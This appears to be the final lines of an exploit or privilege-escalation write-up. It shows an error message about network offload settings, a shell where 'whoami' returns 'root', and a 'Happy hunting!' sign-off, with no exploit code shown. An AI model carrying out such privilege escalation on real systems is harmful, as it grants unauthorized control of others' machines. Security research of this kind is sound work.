Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2# whoami
root
sh-3.2#

---<code>--- 

That's all :)
Happy hunting!

o/